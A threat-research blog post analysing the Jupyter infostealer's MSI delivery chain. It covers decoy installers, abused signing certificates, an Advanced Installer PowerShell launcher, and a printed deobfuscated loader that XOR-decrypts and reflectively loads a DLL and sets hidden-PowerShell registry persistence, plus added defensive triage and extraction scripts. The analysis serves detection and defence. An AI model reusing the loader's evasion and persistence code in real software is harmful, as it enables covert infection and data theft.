New Jupyter Evasive delivery via MSI installer



In 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets Chromium, Firefox, and Chrome browser data while retaining the added capabilities of a backdoor.

Since then, Jupyter has remained active and highly evasive. It has continued to receive few or zero detections in the VirusTotal database, maintaining its ability to bypass detection solutions.

Then, on September 8, 2021, we identified a new delivery chain within Jupyter that is going under the radar of security solutions. Following this discovery, the Morphisec Labs team was made aware of several high-level targets threatened by the Jupyter infostealer. We are currently studying the scope of the campaign.

The following blog post describes the new distribution chain, showing how threat actors continue to scale up their attacks to become more effective and evasive.

Technical presentation


Figure 1: The attack flow of the new Jupyter infostealer

MSI payload

In this section, we take a brief look at some attributes the payloads share, so that we know what indicators to expect. This is based on the four variants we have observed.

Payload size and name

Like previous Jupyter payloads, the MSI payloads are consistently larger than 100MB. This size allows the payload to evade inline AV scanners that cap the file size they inspect.

The payload naming convention is:

  • Potential document topics
  • Words are separated by a dash ‘-‘
  • Each word begins with a capital letter

Examples can be found in the IOC section under the title “MSI Payload Names”.

MSI third-party installation wizard

The payloads were generated with a trial version of Advanced Installer (version 18.6.1, build 2c9a75c6).

As described on its website, Advanced Installer is an “all-in-one” application packaging tool. It gives threat actors an easy way to implement obscured script execution.

The attribution can be found either in the file properties (the OLE compound document's summary information) or in the installer's Property table.

Figure 2: OLE Compound File Information


The properties table

Figure 3: Properties table

Decoy installation executable

As shown in Figure 1 above, all observed variants are described as Nitro Pro 13. Once the victim runs the MSI payload, a legitimate Nitro Pro 13 installation binary is executed as a decoy. The correlation between this attribution and the variant file names suggests that the delivery method disguises the payload as a PDF document.


Figure 4: Installing Nitro Pro 13

While all of the variants are described as Nitro, one of them actually contains SumatraPDF instead.


Figure 5: Installing Sumatra PDF

Digital signature

Two of the variants are signed with a (currently) valid certificate named ‘SP ZOO TACHOPARTS’.


Figure 6: Tachoparts certificate

Based on the following certificate data, we can assume that the threat actor either impersonated the certificate or stole it from a legitimate company in Poland.


Figure 7: Tachoparts commercial information from Google

Another variant was signed with a revoked certificate named ‘OOO Sistema’.


Figure 8: OOO Sistema certificate

As with the previous certificate, this one also corresponds to a legitimate business. It was likely a case of identity theft or theft from within the company.


Figure 9: Google OOO Sistema commercial information

Running PowerShell

The first suspicious indicator visible in dynamic analysis is the PowerShell command line spawned by msiexec.exe.

Command line

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass
        -File 'C:\Users\<user>\AppData\Local\Temp\pssEA35.ps1 '
        -propFile 'C:\Users\<user>\AppData\Local\Temp\msiEA13.txt '
        -scriptFile 'C:\Users\<user>\AppData\Local\Temp\scrEA14.ps1 '
        -scriptArgsFile 'C:\Users\<user>\AppData\Local\Temp\scrEA15.txt '
        -propSep ':: '
        -testPrefix '_testValue.'

Code block 1: CMD Shell command line

This command line is generated by an Advanced Installer feature designed to run a PowerShell script as a “CustomAction” defined in the MSI installer.

The file names in the parameters differ between variants but keep the same pattern. For example, in ‘scrEA14.ps1’, EA14 is a sequence of four hexadecimal characters, and these four characters differ between payload variants.
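As an added example (not code from the original post or from Morphisec), the following Python triage function recognises the launcher parameter set from Code block 1 in a powershell.exe command line spawned by msiexec.exe and returns the temp-file paths an analyst should collect. The parameter names are the ones shown on the page; the process records are constructed for the example.

```python
"""Triage of powershell.exe command lines spawned by msiexec.exe.

Added example, not from the original post. It looks for the parameter
pattern of the Advanced Installer PowerShell launcher seen in Code block 1
(-File pss*.ps1 -propFile msi*.txt -scriptFile scr*.ps1 ...) and reports
which files to pull from %TEMP%. The process events are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Parameter names of the Advanced Installer PowerShell launcher (Code block 1).
LAUNCHER_PARAMS = {"-propfile", "-scriptfile", "-scriptargsfile", "-propsep", "-testprefix"}

# Temp file names in the observed samples: 3-letter prefix + 4 hex characters (e.g. scrEA14.ps1).
TEMP_SCRIPT_RE = re.compile(r"[\\/](pss|scr)[0-9A-Fa-f]{4}\.ps1$", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping single- or double-quoted arguments whole."""
    tokens = re.findall(r"'[^']*'|\"[^\"]*\"|\S+", cmdline)
    return [t.strip("'\"").strip() for t in tokens]


def parse_launcher(cmdline: str) -> Dict[str, str]:
    """Return the launcher's named arguments (lower-cased keys) when the full
    Advanced Installer parameter set is present, otherwise an empty dict."""
    tokens = tokenize(cmdline)
    args: Dict[str, str] = {}
    for i, tok in enumerate(tokens):
        if tok.startswith("-") and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            args[tok.lower()] = tokens[i + 1]
    if not LAUNCHER_PARAMS.issubset(args):
        return {}
    return args


def triage(event: ProcessEvent) -> Optional[dict]:
    """Flag powershell.exe started by msiexec.exe with the launcher parameter set.
    Returns a finding with the artefacts to collect, or None when the rule does not apply."""
    if not event.parent_image.lower().endswith("msiexec.exe"):
        return None
    if not event.image.lower().endswith("powershell.exe"):
        return None
    args = parse_launcher(event.command_line)
    if not args:
        return None
    script = args.get("-scriptfile", "")
    return {
        "script_file": script,
        "temp_name_pattern": bool(TEMP_SCRIPT_RE.search(script)),
        "execution_policy_bypass": args.get("-executionpolicy", "").lower() == "bypass",
        "non_interactive": "-noninteractive" in event.command_line.lower(),
        # The embedded loader lives in -scriptFile; the other two hold its inputs.
        "collect": [args.get("-scriptfile"), args.get("-scriptargsfile"), args.get("-propfile")],
    }


# Constructed sample command line in the shape of Code block 1 (user name is a placeholder).
SAMPLE_CMDLINE = (
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive "
    r"-ExecutionPolicy Bypass -File 'C:\Users\analyst\AppData\Local\Temp\pssEA35.ps1 ' "
    r"-propFile 'C:\Users\analyst\AppData\Local\Temp\msiEA13.txt ' "
    r"-scriptFile 'C:\Users\analyst\AppData\Local\Temp\scrEA14.ps1 ' "
    r"-scriptArgsFile 'C:\Users\analyst\AppData\Local\Temp\scrEA15.txt ' "
    r"-propSep ':: ' -testPrefix '_testValue.'"
)

# Constructed process events: one matching the pattern, two that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_CMDLINE),
    # An interactive admin shell: wrong parent, no launcher parameters.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -NoProfile"),
    # msiexec child without the Advanced Installer launcher parameter set.
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\setup.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The same launcher is emitted by any Advanced Installer package that uses its PowerShell custom action, so a hit is a triage signal rather than a verdict: the follow-up is to collect the file named by -scriptFile from %TEMP% and check it for the loader pattern described in the next section.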


Figure 9: PowerShell loader integrated into CustomAction in AdvancedInstaller

Jupyter PowerShell loader

The PowerShell file passed in the -scriptFile parameter shown in Code block 1 is the Jupyter PowerShell loader.

This loader is very similar to previous Jupyter loaders in that it remains highly evasive, with zero to very few detections on VirusTotal, which is rare for a complete PowerShell loader (loader code with an embedded payload).

While Jupyter loaders have been covered extensively in our blog and elsewhere, the new variant shares the same code pattern. The following code block is a deobfuscated and cleaned-up version of it:

    $b64_enc_payload = '<redacted>';

    $random_path_str = 'jeiJBgXRTuVfsm';
    $payload_directory_path = $ENV:APPDATA + "\Microsoft\" + $random_path_str;
    $enc_payload_path = $payload_directory_path + '\' + $random_path_str + '.' + $random_path_str;
    [System.IO.File]::WriteAllBytes($enc_payload_path, [System.Convert]::FromBase64String($b64_enc_payload));

    $decode_and_execute_payload_script = '<the code below, embedded in a comment>';
    $xor_key = "<redacted base64 key>";
    $b64_enc_payload = [System.IO.File]::ReadAllBytes($enc_payload_path);
    For ($i = 0; $i -lt $b64_enc_payload.Count;) {
        For ($y = 0; $y -lt $xor_key.Length; $y++) {
            $b64_enc_payload[$i] = $b64_enc_payload[$i] -bxor $xor_key[$y];
            $i++;
            if ($i -ge $b64_enc_payload.Count) {
                $y = $xor_key.Length
            }
        }
    }
    [System.Reflection.Assembly]::Load($b64_enc_payload);  # Load the 'interact' method

    Create_Registry_Key -reg_path () -execution_command ('Powershell -WindowStyle Hidden -ep Bypass -Command "' + $decode_and_execute_payload_script + '"');
    Create_Registry_Key -reg_path () -execution_command $random_path_str.ToLower();

    $lnk_object = (New-Object -ComObject WScript.Shell).CreateShortcut($ENV:APPDATA + <path truncated in the original>);
    $lnk_object.TargetPath = $payload_directory_path + '\' + $random_path_str;
    $lnk_object.WindowStyle = 7;
    $lnk_object.Save();

    IEX $decode_and_execute_payload_script;

Code block 2: Deobfuscated Jupyter PowerShell loader

Note that, like previous versions, this one also reflectively loads a DLL whose execution starts in Mars.Deimos (the Deimos class under the Mars namespace).
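As an added example, not part of the original post, the following Python reproduces the loader's decryption step offline so the embedded .NET DLL can be extracted for static analysis without running the script. The regexes assume the deobfuscated variable names from Code block 2; the loader fragment, key and payload bytes are constructed for the example.

```python
"""Offline extraction of the XOR-wrapped .NET payload from a Jupyter-style
PowerShell loader (added example, not from the original post).

The loader in Code block 2 base64-decodes a blob to disk, XORs it with a
repeating string key and passes the result to Assembly.Load. The nested
For loops reduce to byte[i] ^= key[i mod len(key)], so the same XOR
recovers the DLL from either the loader text or the dropped file.
"""
import base64
import re
from typing import Optional

# Assignments as they appear in the deobfuscated listing (variable names assumed from Code block 2).
KEY_RE = re.compile(r'\$xor_key\s*=\s*"([^"]*)"')
PAYLOAD_RE = re.compile(r"\$b64_enc_payload\s*=\s*'([A-Za-z0-9+/=\s]*)'")


def xor_repeating(data: bytes, key: str) -> bytes:
    """Repeating-key XOR; key characters are used by code point like PowerShell's [char] -bxor."""
    kb = key.encode("latin-1")
    return bytes(b ^ kb[i % len(kb)] for i, b in enumerate(data))


def extract_payload(loader_text: str) -> Optional[bytes]:
    """Pull the base64 blob and XOR key out of loader text and return the decrypted bytes."""
    key_m = KEY_RE.search(loader_text)
    pay_m = PAYLOAD_RE.search(loader_text)
    if not key_m or not pay_m:
        return None
    encrypted = base64.b64decode("".join(pay_m.group(1).split()))
    return xor_repeating(encrypted, key_m.group(1))


def decrypt_dropped_file(file_bytes: bytes, key: str) -> bytes:
    """The file written under %APPDATA%\\Microsoft\\<random> holds the same XORed bytes."""
    return xor_repeating(file_bytes, key)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check on the result: 'MZ' DOS header and a PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_constructed_sample() -> str:
    """Constructed loader fragment: a tiny PE-shaped blob, XORed and base64-encoded,
    laid out like the assignments in the deobfuscated loader."""
    fake_pe = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x4c\x01"
    key = "Tp3xQ"  # constructed key, not from any sample
    b64 = base64.b64encode(xor_repeating(fake_pe, key)).decode()
    return "$b64_enc_payload = '" + b64 + "';\n$xor_key = \"" + key + "\";\n"


if __name__ == "__main__":
    dll = extract_payload(build_constructed_sample())
    print("PE header present:", dll is not None and looks_like_pe(dll))
```

In practice the key and blob come from the script collected out of %TEMP%; checking the PE header before doing anything else with the output catches a wrong key or a second encoding layer early.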

The payload of the .NET DLL

In our previous blog, we attributed the payloads to their internal version. The following table correlates the observed internal version and the earliest submission date of the MSI payload to the detections on VirusTotal.

Internal version of the Jupyter DLL | VirusTotal first submission | VirusTotal detections
                                    | September 08, 2021          | 1/57 malicious
                                    | September 08, 2021          | 2/57 malicious
                                    | September 10, 2021          | 0/57 malicious
                                    | September 13, 2021          | 0/57 malicious

Although all of the .NET DLL payloads are expected to be obfuscated, the SP-10 variant appears to contain source code strings. The following figure shows the payload's method and class names.



The evolution of the Jupyter infostealer / backdoor since we first identified it in 2020 proves the truth of the claim that threat actors are always innovating. The fact that this attack continues to have little or no detections on VirusTotal further indicates the ease with which threat actors evade detection-based solutions. It is clear that a new approach is needed for threat prevention, as it is likely that these evasive attacks will continue.

This is why Morphisec has designed its solutions to focus on deterministic prevention of evasive attacks rather than detection. Customers who run the Morphisec breach prevention platform on their endpoints, on-premise servers, and in the cloud can rest assured that they are protected against evasive threats such as the Jupyter infostealer, regardless of its detection rate on VirusTotal.



MSI payload hashes


AdvancedInstall PowerShell Hash


Jupyter PowerShell Loader Hashes




Jupyter payloads







MSI payload names



